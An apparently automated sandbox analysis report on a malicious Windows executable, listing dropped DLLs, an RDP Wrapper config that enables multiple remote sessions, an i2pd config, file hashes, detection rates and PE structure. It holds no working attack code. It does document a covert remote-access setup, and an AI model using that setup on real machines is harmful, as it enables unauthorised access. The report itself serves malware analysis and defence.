Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Windows\Temp\oWkqS6Ji

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.285421743969757
Encrypted:	false
SSDEEP:	1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
MD5:	6E01ED70D02CE47F4D27762A9E949DEE
SHA1:	32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
SHA-256:	EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
SHA-512:	B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Windows\Temp\r9vFmZ4q

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Windows\Temp\wwgq2y6S

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.193969228624904
Encrypted:	false
SSDEEP:	1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
MD5:	EC9499EE84ED09B77BE0A35EC87B781C
SHA1:	4148D40284BAB415DDB828BD4061A4FE93C9AF26
SHA-256:	5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
SHA-512:	D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465574597026334
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:zXD94zWlLZMM6YFHx+h
MD5:	44682A3D0469D008C49805F95F2501F2
SHA1:	8D45D99D347183FAC85AA2B44516E84B2FFDE8D4
SHA-256:	6E9D423480106A82A069DCE49FF54CD3A4179CBEEDC06D04A33507FCC5FC7B0E
SHA-512:	F5BA0B660720B8F91ECF16C935FC89B6BB8DAC9D321FFC225FE1B72312BD7EF7093997246689BBE559BA02AF5F0E6C0A27CBA4DAB9535BCC52209EC8833B5A34
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..\|.^d..............................................................................................................................................................................................................................................................................................................................................^.k.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.090626315462076
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	80P.exe
File size:	13'431'296 bytes
MD5:	f0cfd22855ee0cf1935a36ea32f15138
SHA1:	8d971dc8a0f41f2e2c9dbd80f4b0cd5e1f164a96
SHA256:	acc39a1fdfcecae66662397c3d8e49d29efaebd8739f1603870a01dd3a603db7
SHA512:	3215d35ccb3139a6b0e8f8ce14f9ffeb4162fd86fbf14195d5a3adfe204f1094731114ddd8ad72f2ab9fc4cc7f871a427b26b051ce6a0e5e59f60c4cd981c699
SSDEEP:	98304:DTVRJeZFMLcycZsAqoeosQJ2XP4CRXKdQI:nMZFMtcQoeoJJ2XQ
TLSH:	5BD64AAB77A5816AC11EC13FC0A38F14E933B0BD1B33C2E756A006686E569D15E3F725
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	6ab06e9aaaba8e50

Static PE Info

General

Entrypoint:	0xda13b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x677F84C7 [Thu Jan 9 08:11:51 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	e9ab8d1a1e1aadf77912f5c21a0fe136

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFE7948h]
call 00007F734C61E230h
dec eax
mov eax, dword ptr [000CF06Ch]
dec eax
mov ecx, dword ptr [eax]
call 00007F734C8D9621h
dec eax
mov eax, dword ptr [000CF05Dh]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007F734C8DC2D0h
dec eax
mov eax, dword ptr [000CF04Ch]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFE729Ah]
dec esp
mov eax, dword ptr [000CF713h]
call 00007F734C8D9623h
dec eax
mov eax, dword ptr [000CF02Fh]
dec eax
mov ecx, dword ptr [eax]
call 00007F734C8D9834h
call 00007F734C615A9Fh
jmp 00007F734CFA70AAh
nop
nop
call 00007F734C615C96h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007F734C61522Ch
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xaa2000	0x9b	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa92000	0x5428	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba4000	0x152400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb29000	0x7ab44	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa5000	0x83a34	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xaa4000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa935d0	0x13d8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xa98000	0x91e8	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9a0440	0x9a0600	86ab2c29a74a9a3f8286ef7f07a6c44a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x9a2000	0xcee88	0xcf000	e7c0216a0b9eb2d7bb050025a60dbaec	False	0.24514195538949277	data	5.013415006905215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xa71000	0x2009c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa92000	0x5428	0x5600	8079d6b23603a8d628668b529d4acd7e	False	0.24186954941860464	data	4.197586647952889	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xa98000	0x91e8	0x9200	84f4aba25f0fcdc394fc7ea937b302a3	False	0.17251712328767124	data	3.9960604688613506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xaa2000	0x9b	0x200	fb38ec46dc9b947d7acbee5f0402f0e2	False	0.259765625	data	1.9037880203964852	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xaa3000	0x1e4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xaa4000	0x6d	0x200	65e0a56bbc168ec70c7cc399dfdc440a	False	0.1953125	data	1.3785450098484393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa5000	0x83a34	0x83c00	180edf31e87591fbd0f232d1cbd6ddf3	False	0.4384747094402277	data	6.419267216465653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0xb29000	0x7ab44	0x7ac00	bd68278add5290f49786a6ee841901cf	False	0.49804289714867617	data	6.514485853671856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xba4000	0x152400	0x152400	a3dbd25a8e596a879751061a0cef81d6	False	0.34984323032150777	data	6.492346409529165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xba6d64	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0xba6e98	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0xba6fcc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0xba7100	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0xba7234	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0xba7368	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0xba749c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0xba75d0	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 0			0.20460607304062373
RT_ICON	0xbac1f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.4031791907514451
RT_ICON	0xbac760	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.6814079422382672
RT_ICON	0xbad008	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.517590618336887
RT_ICON	0xbadeb0	0x5c70	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9795892494929006
RT_STRING	0xbb3b20	0x9c0	data			0.27123397435897434
RT_STRING	0xbb44e0	0x79c	data			0.2818275154004107
RT_STRING	0xbb4c7c	0x380	data			0.4029017857142857
RT_STRING	0xbb4ffc	0x43c	data			0.36900369003690037
RT_STRING	0xbb5438	0x464	data			0.34519572953736655
RT_STRING	0xbb589c	0x490	data			0.3236301369863014
RT_STRING	0xbb5d2c	0x504	data			0.39485981308411217
RT_STRING	0xbb6230	0x214	data			0.4473684210526316
RT_STRING	0xbb6444	0x3d8	data			0.24491869918699186
RT_STRING	0xbb681c	0x2d4	data			0.4516574585635359
RT_STRING	0xbb6af0	0x49c	data			0.4228813559322034
RT_STRING	0xbb6f8c	0x404	data			0.4260700389105058
RT_STRING	0xbb7390	0x244	data			0.4586206896551724
RT_STRING	0xbb75d4	0x2d4	data			0.48342541436464087
RT_STRING	0xbb78a8	0x504	data			0.3878504672897196
RT_STRING	0xbb7dac	0x3b4	data			0.3818565400843882
RT_STRING	0xbb8160	0x388	data			0.375
RT_STRING	0xbb84e8	0x2e4	data			0.4743243243243243
RT_STRING	0xbb87cc	0x3bc	data			0.3619246861924686
RT_STRING	0xbb8b88	0x304	data			0.3911917098445596
RT_STRING	0xbb8e8c	0x3f8	data			0.4153543307086614
RT_STRING	0xbb9284	0x3f4	data			0.3932806324110672
RT_STRING	0xbb9678	0x548	data			0.28920118343195267
RT_STRING	0xbb9bc0	0x308	data			0.42010309278350516
RT_STRING	0xbb9ec8	0x260	data			0.45394736842105265
RT_STRING	0xbba128	0x110	data			0.6139705882352942
RT_STRING	0xbba238	0x44c	data			0.37454545454545457
RT_STRING	0xbba684	0x450	data			0.3976449275362319
RT_STRING	0xbbaad4	0x5c8	data			0.34256756756756757
RT_STRING	0xbbb09c	0x470	data			0.3503521126760563
RT_STRING	0xbbb50c	0x2c0	data			0.3991477272727273
RT_STRING	0xbbb7cc	0x418	data			0.3998091603053435
RT_STRING	0xbbbbe4	0x9c	data			0.717948717948718
RT_STRING	0xbbbc80	0xe8	data			0.6293103448275862
RT_STRING	0xbbbd68	0x364	data			0.423963133640553
RT_STRING	0xbbc0cc	0x410	data			0.3663461538461538
RT_STRING	0xbbc4dc	0x354	data			0.392018779342723
RT_STRING	0xbbc830	0x5b0	data			0.32005494505494503
RT_STRING	0xbbcde0	0x250	data			0.33952702702702703
RT_STRING	0xbbd030	0x414	data			0.4157088122605364
RT_STRING	0xbbd444	0x6ac	data			0.3366510538641686
RT_STRING	0xbbdaf0	0x46c	data			0.3568904593639576
RT_STRING	0xbbdf5c	0x368	data			0.37729357798165136
RT_STRING	0xbbe2c4	0x34c	data			0.3886255924170616
RT_STRING	0xbbe610	0x3c4	data			0.36721991701244816
RT_STRING	0xbbe9d4	0x3fc	data			0.3764705882352941
RT_STRING	0xbbedd0	0xd0	data			0.5288461538461539
RT_STRING	0xbbeea0	0xb8	data			0.6467391304347826
RT_STRING	0xbbef58	0x2c0	data			0.46732954545454547
RT_STRING	0xbbf218	0x434	data			0.3308550185873606
RT_STRING	0xbbf64c	0x360	data			0.38425925925925924
RT_STRING	0xbbf9ac	0x2ec	data			0.37566844919786097
RT_STRING	0xbbfc98	0x31c	data			0.34296482412060303
RT_RCDATA	0xbbffb4	0x627e	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3	English	United States	0.9922265408106608
RT_RCDATA	0xbc6234	0x10	data			1.5
RT_RCDATA	0xbc6244	0x1536	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel	English	United States	0.6550644567219153
RT_RCDATA	0xbc777c	0x359	GIF image data, version 89a, 16 x 16	English	United States	0.15635939323220538
RT_RCDATA	0xbc7ad8	0x378	GIF image data, version 89a, 21 x 21	English	United States	0.5529279279279279
RT_RCDATA	0xbc7e50	0x12c	GIF image data, version 89a, 10 x 12	English	United States	0.83
RT_RCDATA	0xbc7f7c	0x129	GIF image data, version 89a, 10 x 12	English	United States	0.7575757575757576
RT_RCDATA	0xbc80a8	0x4c8	GIF image data, version 89a, 24 x 24	English	United States	0.6282679738562091
RT_RCDATA	0xbc8570	0x4b5	GIF image data, version 89a, 24 x 24	English	United States	0.5526970954356847
RT_RCDATA	0xbc8a28	0x42e	GIF image data, version 89a, 24 x 24	English	United States	0.5112149532710281
RT_RCDATA	0xbc8e58	0x42e	GIF image data, version 89a, 24 x 24	English	United States	0.4766355140186916
RT_RCDATA	0xbc9288	0x432	GIF image data, version 89a, 24 x 24	English	United States	0.5027932960893855
RT_RCDATA	0xbc96bc	0x434	GIF image data, version 89a, 24 x 24	English	United States	0.4758364312267658
RT_RCDATA	0xbc9af0	0x4da	GIF image data, version 89a, 24 x 24	English	United States	0.6191626409017713
RT_RCDATA	0xbc9fcc	0x4c1	GIF image data, version 89a, 24 x 24	English	United States	0.5825801150369762
RT_RCDATA	0xbca490	0x449	GIF image data, version 89a, 24 x 24	English	United States	0.5077484047402006
RT_RCDATA	0xbca8dc	0x455	GIF image data, version 89a, 24 x 24	English	United States	0.5067628494138864
RT_RCDATA	0xbcad34	0x4ce	GIF image data, version 89a, 24 x 24	English	United States	0.6699186991869919
RT_RCDATA	0xbcb204	0x4b9	GIF image data, version 89a, 24 x 24	English	United States	0.5665839536807279
RT_RCDATA	0xbcb6c0	0x32e	GIF image data, version 89a, 24 x 24	English	United States	0.9582309582309583
RT_RCDATA	0xbcb9f0	0x30e	GIF image data, version 89a, 24 x 24	English	United States	0.8491048593350383
RT_RCDATA	0xbcbd00	0x444	GIF image data, version 89a, 24 x 24	English	United States	0.5265567765567766
RT_RCDATA	0xbcc144	0x44f	GIF image data, version 89a, 24 x 24	English	United States	0.4877606527651859
RT_RCDATA	0xbcc594	0x4b5	GIF image data, version 89a, 24 x 24	English	United States	0.6182572614107884
RT_RCDATA	0xbcca4c	0x4ab	GIF image data, version 89a, 24 x 24	English	United States	0.5581589958158996
RT_RCDATA	0xbccef8	0x480	GIF image data, version 89a, 24 x 24	English	United States	0.5815972222222222
RT_RCDATA	0xbcd378	0x46a	GIF image data, version 89a, 24 x 24	English	United States	0.5389380530973451
RT_RCDATA	0xbcd7e4	0x679	HTML document, ASCII text, with CRLF, LF line terminators	English	United States	0.46107423053711527
RT_RCDATA	0xbcde60	0xacf	GIF image data, version 89a, 32 x 32	English	United States	0.6841344416335381
RT_RCDATA	0xbce930	0xe34	GIF image data, version 89a, 105 x 141	English	United States	1.0030253025302531
RT_RCDATA	0xbcf764	0xa25	GIF image data, version 89a, 171 x 75	English	United States	1.0042356565267616
RT_RCDATA	0xbd018c	0x4b	GIF image data, version 89a, 16 x 16	English	United States	0.9733333333333334
RT_RCDATA	0xbd01d8	0x3f	GIF image data, version 89a, 12 x 16	English	United States	1.0317460317460319
RT_RCDATA	0xbd0218	0x6e	GIF image data, version 89a, 16 x 16	English	United States	1.009090909090909
RT_RCDATA	0xbd0288	0x50	GIF image data, version 89a, 16 x 16	English	United States	1.025
RT_RCDATA	0xbd02d8	0x6c	GIF image data, version 89a, 16 x 16	English	United States	1.0092592592592593
RT_RCDATA	0xbd0344	0x4f	GIF image data, version 89a, 16 x 16	English	United States	1.0253164556962024
RT_RCDATA	0xbd0394	0x6f	GIF image data, version 89a, 17 x 16	English	United States	1.018018018018018
RT_RCDATA	0xbd0404	0x41	GIF image data, version 89a, 15 x 15	English	United States	0.9846153846153847
RT_RCDATA	0xbd0448	0x3c	GIF image data, version 89a, 16 x 12	English	United States	1.0333333333333334
RT_RCDATA	0xbd0484	0x69	GIF image data, version 89a, 16 x 16	English	United States	1.019047619047619
RT_RCDATA	0xbd04f0	0x4d	GIF image data, version 89a, 16 x 16	English	United States	1.025974025974026
RT_RCDATA	0xbd0540	0x71	GIF image data, version 89a, 16 x 17	English	United States	1.079646017699115
RT_RCDATA	0xbd05b4	0x69	GIF image data, version 89a, 16 x 16	English	United States	1.0095238095238095
RT_RCDATA	0xbd0620	0x4d	GIF image data, version 89a, 16 x 16	English	United States	1.025974025974026
RT_RCDATA	0xbd0670	0x45a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.47217235188509876
RT_RCDATA	0xbd0acc	0x36	GIF image data, version 89a, 1 x 1	English	United States	1.037037037037037
RT_RCDATA	0xbd0b04	0x91	GIF image data, version 89a, 16 x 16	English	United States	0.8137931034482758
RT_RCDATA	0xbd0b98	0x82	GIF image data, version 89a, 16 x 16	English	United States	0.7769230769230769
RT_RCDATA	0xbd0c1c	0x6c	GIF image data, version 89a, 11 x 9	English	United States	0.6944444444444444
RT_RCDATA	0xbd0c88	0x9e	GIF image data, version 89a, 16 x 16	English	United States	0.8354430379746836
RT_RCDATA	0xbd0d28	0x6f	GIF image data, version 89a, 11 x 9	English	United States	0.7027027027027027
RT_RCDATA	0xbd0d98	0x356	GIF image data, version 89a, 16 x 16	English	United States	0.12295081967213115
RT_RCDATA	0xbd10f0	0x355	GIF image data, version 89a, 16 x 16	English	United States	0.123094958968347
RT_RCDATA	0xbd1448	0x355	GIF image data, version 89a, 16 x 16	English	United States	0.12192262602579132
RT_RCDATA	0xbd17a0	0x361	GIF image data, version 89a, 16 x 16	English	United States	0.13179190751445086
RT_RCDATA	0xbd1b04	0x3ae	GIF image data, version 89a, 16 x 16	English	United States	0.25796178343949044
RT_RCDATA	0xbd1eb4	0x3b5	GIF image data, version 89a, 16 x 16	English	United States	0.291886195995785
RT_RCDATA	0xbd226c	0x38c	GIF image data, version 89a, 16 x 16	English	United States	0.21585903083700442
RT_RCDATA	0xbd25f8	0x41a	GIF image data, version 89a, 16 x 16	English	United States	0.6266666666666667
RT_RCDATA	0xbd2a14	0x36e	GIF image data, version 89a, 16 x 16	English	United States	0.15945330296127563
RT_RCDATA	0xbd2d84	0x36d	GIF image data, version 89a, 16 x 16	English	United States	0.1573546180159635
RT_RCDATA	0xbd30f4	0x354	GIF image data, version 89a, 16 x 16	English	United States	0.11854460093896714
RT_RCDATA	0xbd3448	0x394	GIF image data, version 89a, 16 x 16	English	United States	0.1965065502183406
RT_RCDATA	0xbd37dc	0x3b0	GIF image data, version 89a, 16 x 16	English	United States	0.2552966101694915
RT_RCDATA	0xbd3b8c	0x3e7	GIF image data, version 89a, 16 x 16	English	United States	0.42842842842842843
RT_RCDATA	0xbd3f74	0x3ee	GIF image data, version 89a, 16 x 16	English	United States	0.6272365805168986
RT_RCDATA	0xbd4364	0x368	GIF image data, version 89a, 16 x 16	English	United States	0.13876146788990826
RT_RCDATA	0xbd46cc	0x37f	GIF image data, version 89a, 16 x 16	English	United States	0.28044692737430166
RT_RCDATA	0xbd4a4c	0x37f	GIF image data, version 89a, 16 x 16	English	United States	0.27932960893854747
RT_RCDATA	0xbd4dcc	0x362	GIF image data, version 89a, 16 x 16	English	United States	0.13279445727482678
RT_RCDATA	0xbd5130	0x531b	ASCII text, with very long lines (16079)	English	United States	0.2575323149236193
RT_RCDATA	0xbda44c	0x3457	ASCII text, with very long lines (13399), with no line terminators	English	United States	0.27718486454213
RT_RCDATA	0xbdd8a4	0x38c1	ASCII text, with very long lines (14529), with no line terminators	English	United States	0.2771697983343657
RT_RCDATA	0xbe1168	0xa64	ASCII text, with very long lines (2660), with no line terminators	English	United States	0.3669172932330827
RT_RCDATA	0xbe1bcc	0xbe1	ASCII text, with very long lines (3041), with no line terminators	English	United States	0.3909898059848734
RT_RCDATA	0xbe27b0	0x134a	ASCII text, with very long lines (4938), with no line terminators	English	United States	0.24807614418793034
RT_RCDATA	0xbe3afc	0x677	ASCII text, with very long lines (1655), with no line terminators	English	United States	0.313595166163142
RT_RCDATA	0xbe4174	0x4cd	HTML document, ASCII text, with very long lines (1229), with no line terminators	English	United States	0.49308380797396256
RT_RCDATA	0xbe4644	0x1775	ASCII text, with very long lines (6005), with no line terminators	English	United States	0.24196502914238135
RT_RCDATA	0xbe5dbc	0xdcd	ASCII text, with very long lines (3533), with no line terminators	English	United States	0.3014435324087178
RT_RCDATA	0xbe6b8c	0x17278	HTML document, Unicode text, UTF-8 text, with very long lines (32769)	English	United States	0.354924082665542
RT_RCDATA	0xbfde04	0xd0f	ASCII text, with very long lines (3142)	English	United States	0.4552796889021837
RT_RCDATA	0xbfeb14	0x6ecc	ASCII text, with very long lines (28364), with no line terminators	English	United States	0.2744676350303201
RT_RCDATA	0xc059e0	0xc9c7	ASCII text, with very long lines (51655), with no line terminators	English	United States	0.24799148194753654
RT_RCDATA	0xc123a8	0x1e82	ASCII text, with very long lines (7146), with CRLF line terminators	English	United States	0.3613316261203585
RT_RCDATA	0xc1422c	0xdb2	ASCII text, with CRLF line terminators	English	United States	0.32857957786651454
RT_RCDATA	0xc14fe0	0x1958	data			0.4563810110974106
RT_RCDATA	0xc16938	0x151	Delphi compiled form 'TForm1'			0.7210682492581603
RT_RCDATA	0xc16a8c	0x33c2	HTML document, ASCII text, with CRLF line terminators	Dutch	Belgium	0.20422641509433961
RT_RCDATA	0xc19e50	0x3a205	data	English	United States	0.6415397862108071
RT_RCDATA	0xc54058	0x4c651	data	English	United States	0.17103795623703713
RT_RCDATA	0xca06ac	0x5580d	data	English	United States	0.2652239585861499
RT_GROUP_CURSOR	0xcf5ebc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xcf5ed0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xcf5ee4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xcf5ef8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xcf5f0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xcf5f20	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xcf5f34	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0xcf5f48	0x4c	data			0.8289473684210527
RT_VERSION	0xcf5f94	0x314	data	Chinese	China	0.45558375634517767

Imports

DLL	Import
